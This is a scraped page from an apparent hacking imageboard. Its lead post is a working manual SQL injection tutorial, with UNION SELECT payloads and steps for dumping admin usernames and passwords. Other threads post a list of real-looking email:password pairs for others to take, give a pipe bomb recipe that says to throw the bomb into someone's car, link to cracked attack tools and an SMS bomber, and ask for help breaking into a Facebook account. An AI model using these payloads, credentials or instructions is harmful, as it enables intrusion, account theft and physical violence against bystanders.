/hf/ - SQLi (part 1)
SQL injection is a code injection technique, in which malicious SQL statements are inserted into an entry field for execution.What you'll need -
*A list of dorks, I got these for you:
http://www.mediafire.com/download/lzy8cjo52xct1m4/Dorks.txt
*A functioning brain (50% of you can stop reading here)
We'll be covering manual and blind SQLi injection, No Havij.
Step №1 - Check for vulnerability
You can either use a vulnerability scanner or manually check websites, it's up to you.
Using the lists of dork, find a website, let's say we found www.halfchan.org/news.php?id=4
We add an apostrophe to the end of the URL and hope it relays a SQL error back to us.
www.halfchan.org/news.php?id=4
becomes
www.halfchan.org/news.php?id=4'
An indication of a vulnerable website is a message along the lines of;
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server"
Great, halfchan is vulnerable and ready to be injected.
Step №2 - Find number of columns
Finding a number of columns is usually achieved by declaring the ORDER BY statement, we will keep constant increments until we get a relayed error
www.halfchan.org/news.php?id=4 order by 1/* <– no error
www.halfchan.org/news.php?id=4 order by 2/* <– no error
www.halfchan.org/news.php?id=4 order by 3/* <– no error
www.halfchan.org/news.php?id=4 order by 4/* <– error (we get a relayed message along the lines of Unknown column ‘4′ in ‘order clause’)
We do not count the last table because it does not exist, so we have 3 columns.
Step №3 - Discover UNION
We declare UNION statement at the end of the URL to find out which tables are vulnerable
www.halfchan.org/news.php?id=4 union all select 1,2,3/*
Step №4 - Extract SQL Version
Our UNION command told us that table 2 is vulnerable, so we will use that table to extract the version, it's important to understand that SQLi only works on MySQL versions below 5
Replace the vulnerable number table with @@version, our vulnerable table is two, so we remove the 2 from the URL and insert @@version in order to relay the MySQL version back to us
www.halfchan.org/news.php?id=4 union all select 1,@@version,3/*
In case the server does not relay the MySQL version back to you, we declare convert() function in order to bypass the error, in case it's caused by unicode issues.
www.halfchan.org/news.php?id=4 union all select 1,convert(@@version using latin1),3/*
If the server still refuses to relay the version, which probably means the charset is not set to default, we can try bypassing it with this additional syntax
www.halfchan.org/news.php?id=4 union all select 1,unhex(hex(@@version)),3/*
At last, we have our version, it's below 5 and we can carry on.
Step №5 - Obtaining tables and columns names manually
This is a straining and boring step, which is why I recommend getting Havij to do it for you, however, the basics are important.
Common table names: user(s), admin(s), member(s) - these also happen to be the tables we will need to get some tasty information.
Common column names: username, user, usr, user_name, password, pass, passwd, pwd
Attempting to relay one of the tables is simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,2,3 from admin/*
If the table exists, relaying a column is also simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,username,3 from admin/*
This is a guessing game, so either start guessing or use Havij to guess for you.
By some miracle, we got admins table and username column right, and all the usernames are displayed:
Noot
Janitor
Janitor2
Janitor3
User
User
User
User
User
Great, now we know the halfchan's administrator username, Noot.
Getting the password depends on how the database is set up, sometimes they're unecrypted and are plain text, and sometimes they're md5 hashed, I've seen it all.
By now you should know how to maneuver around tables and columns, so we head over to the passwords column
www.halfchan.org/news.php?id=4 union all select 1,password,3 from admin/*
This usually relays a large string of confusing wall of text, it can be re-arranged to look all pretty and nice using the concat statement
www.halfchan.org/news.php?id=4 union all select 1,concat(username,0×3a,password),3 from admin/* (0×3a is a hash value for colon (:) which will separate our usernames and passwords from the admin table.)
Noot:ILoveBigCocks
Janitor:123456
Janitor2:password
Janitor3:8chanisbetter
User:41241251
And so forth.
If your keyboard has no : because you're finnish or something, you can use ascii aswell.
www.halfchan.org/news.php?id=4 union all select 1,concat(username,char(58),password),3 from admin/*
A last resort if you cannot guess tables or columns would be using mysql.user as default.
part 2 next reply
Welcome to /hf/ - Hack Funk
This is an info and discussion board regarding hacking, cracking, skidding and all malicious security acts.
Discussed topics can be but not limited to:
Botnets, IRC Bots, and Zombies,
Cryptography, Encryption, and Decryption
Pentesting and Forensics,
Decompiling, Reverse Engineering, Disassembly, and Debugging,
Worms, Malware, and Viruses,
Doxing, Personal Information Masking, Databases, Anonymity.
Feel free to ask newbie or stupid questions.
Feel free to discuss anything else related.
Global Rules Enforced
Don't be dumb.
The shill project is active.
hack a face book page
i want some one that can hack into a Facebook page and give me the info to get in to the Facebook page myself jason kenji
Tracing a phone # (TextMe app)
Heyo /hf/,
i am having a little bit of a problem. help me trace and shut it down? it's in the TextMe app. 843-888-8602
help pls. harrassment is the reason it needs to be taken care of. don't think it's just because i want to shut it down. help IDing it?
text me app
I have a number that is harassing me and my boyfriend I would like it to be taken down now
This thread will be used to manipulate 8chan's Unique Users system to get this board to the top frontpage boards list, hopefully not getting us rekt by HW.
And HW, if you see this and you are upset…
"It's just a park bro"
can u guys mess up flockdraw more
Kik Me - Kik Bot
The newest version of this bot costs $15, what a joke, here it is for free.
If you don't trust, sandboxie it.
Leak Thread
Dumping HF product leaks here.Steam Grinder Leak =
http://ge.tt/62LDG982/v/0?c
pass is steam11
Leech and L33T Day - Spotify
Here's some accounts, feel free to leech, a thanks in this topic would be appreciated though.
mattfriddle@yahoo.com:bigdawg
vulmer@interbaun.com:jessesmom
Chop1398@gmail.com:05tibby
chezloeber@yahoo.com:ss7833
lauren@queso.com:mintchip4me
shawn.gaskill@vfemail.net:Kodiak_09
jelthompson@comcast.net:s0uth3rn
fdc_chief@hotmail.com:hondarule
robinandersen@me.com:andersen5
They're unchecked, but I'm pretty sure they're all premium, if they're not, let me know and I'll post prems.
Pyrotechnics General
How to make a pipe bomb, no gunpowder.1) GO TO YOUR LOCAL HARDWARE STORE AND TELL THE GUY THAT IS HELPING YOU
THAT YOU WANT A PIECE OF STEEL PIPE ONE FOOT LONG. AND ALSO THAT YOU WANT
THE ENDS THREADED AND YOU ALSO WANT CAPS TO PUT ON THE END.
2) NOW GET AHOLD OF A BABYFOOD JAR. MAKE SURE THAT THE JAR WILL FIT DOWN
THE PIPE REAL EASY LIKE. FILL THE BABYJAR WITH EVERYDAY VINEGAR. MAKE
SURE THE TOP IS SCREWED ON REAL TIGHT. **IF IT IS LOOSE YOU WILL BLOW YOUR
HAND OFF**
3)NOW CAP ONE END OF YOUR PIPE WITH ONE OF THE CAPS THAT YOU SHOULD HAVE
PICKED UP WITH THE PIPE. IF YOU KNOW OF SOMEONE WITH A WIELDER, HAVE HIM
WIELD A BEAD AROUND THE THREADS AFTER YOU HAVE IT CAPPED.
4)PUT SOME SMALL SHARP ROCKS DOWN THE END OF THE PIPE AND THEN SLIDE THE
BABYJAR DOWN INSIDE SO THE GLASS END IS AGAINST THE LITTLE ROCKS. NOW
EMPTY A MEDIUM BOX OF ARM AND HAMMER BAKING SODA INTO THE PIPE. CAP THE
OTHER END OF THE PIPE AND IF YOU CAN WIELD IT, THEN GO FOR IT.
BE FUCKING CAREFUL YOU MIGHT BREAK THE JAR INSIDE AND YOU WON'T
KNOW THAT YOU BROKE IT UNTIL YOU SEE YOUR HAND FLY OFF!!!
5)NOW, WHEN YOU WANT TO BLOW SOMETHING UP, JUST SMACK THE END OF THE PIPE
THAT SENDS THE JAR INSIDE DOWN AGAINST THE SMALL ROCKS. OH YEAH, SMACK IT
AGAINST SOME CONCREAT. THIS BREAKS THE JAR AND THE VINEGAR AND BAKING
SODA MIX TOGETHER AND BUILDS UP PRESSURE. WHEN IT GETS TO THE
CRITICAL POINT….WHAMMY!!!!
**IMPORTANT**
AFTER YOU HIT THE PIPE AGAINST THE GROUND, GET THE HELL RID OF IT!!!
TOSS IT INTO SOMEONES CAR OR SOMEWHERE. SOMETIMES. IT TAKES FIVE MINUTS FOR
IT TO GO OFF, SOMETIMES TWO. BUT IT WILL GO OFF! TRUST ME!
IT CAN TAKE UP TO 5 MINUTES FOR IT TO DETONATE.
Acunetix Web Vulnerability Scanner 10 - For Free
Here's a cracked version of one of the best Vulnerability scanners out there.
Marketed for 'securing your own website' (bullshit)
Use this to find vulnerabilities in websites you want to target.
https://mega.nz/#!gppCjAYZ!NPq23hpdswy3EMtG1OVGEvGhenEod0BcQ0K2Fx1qn1w
Run sandboxied/vmware'd if you don't trust.
Deobfuscator for Confuser.
Here's a little gift I'd enjoy throwing at whoever passes by from time to time.
Find software obfuscated by Confuser
Use this to Deobfuscate
Publish source, acquire internet honor
VirusTotal:
https://www.virustotal.com/en/file/077d8...374643067/
Download:
https://mega.co.nz/#!xgtHXTyK!Icqh32FO8hCYBVFs0z78bR-rBFUY7OOAl4vYHdrnvlc
Run sandboxie'd if you don't trust, don't whine. :)
Holy shit
I never knew 8chan had a HF like board.
HF oldfag (Mar 2009) here, god damnn that site has gone to pure cancer thanks to My Mum himself. Had many fun times but the last few years I left and very rarely login to get random shit like accounts or something.
HelpMeSqlinject
Hello.I have been looking for a weak .php site and i finally found one. http://www.blacksys.co.kr/eng/product/product.php?id=8
so, first what i did was adding an ' after id=8
then i got this error: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bsys/public_html/eng/product/product.php on line 8
And now i'm trying to see how many tables by using: order by 100/* and still getting the error. I can even add order by 1000/* and the are still showing
(yes i'm new to this and do not want to use Havij).
Any tips and tricks?
you better watch out OP! >>>/baphomet/ will ping your IP and it'll be all over!
8chan is great and all, but Yotsuba's user interface (especially the catalog and the mobile theme) are far superior. I am trying to implement Yotsuba's UI into infinity. Anyone interested in doing this?
Use this shit to bomb cellphones into oblivion.
Do not test this on your own device, it will freeze and most likely brick.
https://www.dropbox.com/s/218mrp1scg5vth7/Laquisha%20SMS.exe?dl=0
I am looking for any problems with these guides..
can /hf/ please help me?
A Basic Guide to Online Anonymity
https://paste.sh/PeHdQrTb#8Vv_ywqNsltkmlLwgTyFR2Th
Anti Forensics- Scrubbing Your Computer Clean
https://paste.sh/qA5-Dwwt#fTsHKjgELTkvNjuAsTZAIKIv
CyberGhost Patch by PainteR
https://mega.co.nz/#!pUlBTAaJ!3zac_8mNxYrDejtfB0bX6YM88CvKNIL76HQAkrbeqQA
Have fun while it lasts!
Halp
Reckon any of you geniuses are able to find the password to a RAR file or know how to bypass a rar's password?Tried to download this: http://games.torrentsnack.com/neverwinter-nights-2-pc/
The fucker has a password on it that wants a survey done and since I have shitty Australian internet that means it takes me ages to download anything I would rather see if anyone here is able to find a way to avoid me downloading NWN2 another way.
Crack+ Bruteforcing Platform
Supports multiple threads and modules.Run in sandboxie. >>39
https://mega.co.nz/#!Qk0VWCxJ!z4uP66dy7JkfX_UWB-mMRCJwZSrgMwtdHCnWrc6mqfA
How to avoid being swatted
The edgyness of children online breaks all bounds, kids should know that swatting is a very serious offence which will get you in prison, for a long time, regardless of age.http://www.secretsofthefed.com/15-year-old-swatted-gamer-convicted-domestic-terrorism-25-years-life-federal-prison/
http://www.nbcwashington.com/news/local/Canadian-Teen-Charged-in-Swatting-Calls-Throughout-US-258713271.html?_osource=SocialFlowTwt_DCBrand
Don't be dumb, don't swat.
In the case you feel you have a chance of being swatted, prevention is easy (considering your perpetrator is not familiar with you outside the internet)
1. Google your full name, phone number, address, online nickname, email, and look what's available.
Google is undoubtedly a powerful tool that plays a key role in doxing. Since Google indexes almost anything on the Internet (sometimes even the private information), it is possible to dox for details such as email ID, address, phone numbers and photographs of a person or company. Once you obtain the search results for your query, carefully examine the description part which in most cases contain the piece of information that you are looking for.
2. Get rid of your useless Social Network accounts, unless they contain 0 information about you.
As most Internet users are found to be active on social media, social networking sites such as Facebook and LinkedIn provide a virtual goldmine of information necessary to perform doxing. As most users are unaware of online security issues, they have weak privacy settings on their profile. This makes it easy for the attackers to gain access to personal information such as photographs, real names, location, job, partner’s name etc.
3. Remove your name from a phone registry.
A “Reverse Cell Phone Lookup” is simply a process of finding someone’s personal details such as name, age, address and related information by using their cell phone number and vice versa. There are many online services out there such as cell phone registry that provide access to the personal details about a given person based on his/her phone, name and email ID.
4. Pay an extra $x to remove your whois information from your domains.
If a person or company has a website (or domain name) associated with them, you can easily perform a “whois search” for their website to obtain personal details such as full name, address, email and phone number. Just visit whois.domaintools.com and enter the domain name for which you want to perform a whois search. It will show up all the details associated with the domain name.
EXTRA TIPS;
*Do not upload your photos on public albums, Picasa, photobucket, etc.
*If you absolutely have to use a social network, make it 100% private, Facebook has no such feature, so get rid of it.
*Create separate email IDs for individual activities such as gaming, forum participation, banking accounts etc.
Expensive ass software.
I bought an autel maxidiag elite md802, and it included updates that only lasted a year, now they want 100USD for a new years worth of updates.Is there a code generator for this bullshit out there already?
I can't be the only one
Am I the only one who thinks that all these gets on half chans b are done by scriptfags with the amount of them there is no fucking way it's luck
Groups are almost useless
the day has come where groups are ultimately useless, groups who do something besides sit on their ass and talk bullshit in their little group forum only create duplicate products with almost 0 originality, the groups lost all meaning to me
Useful Scripts
Share your work, for whatever purpose. Try not to fill this will old, broken things that someone else wrote. Please share only your own creations.Here's an SMS Bomber.
https://ghostbin.com/paste/sxov6/raw
Sandboxie - The friendly guide to files on /hf/
Sandboxie is very useful to check whether or not a program is infected, you can also use it to test out your botnet. Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer. Observe pic related.Before opening any 'mysterious' file you're unsure about, isolate it in sandboxie, or open it in a simulated OS.
http://www.sandboxie.com/index.php?DownloadSandboxie
Proxy Dump (Proof within files)
Dumping working proxies, feel free to dump your own.24-Jan-15
http://pastebin.com/QDmhYaVX
I don't understand why Overlord is so stubborn with getting some needed features, like the notice when quoted feature, we need it.
>ITT CC's
i enjoy omnisc1ent's sticky poops
have a potato niggers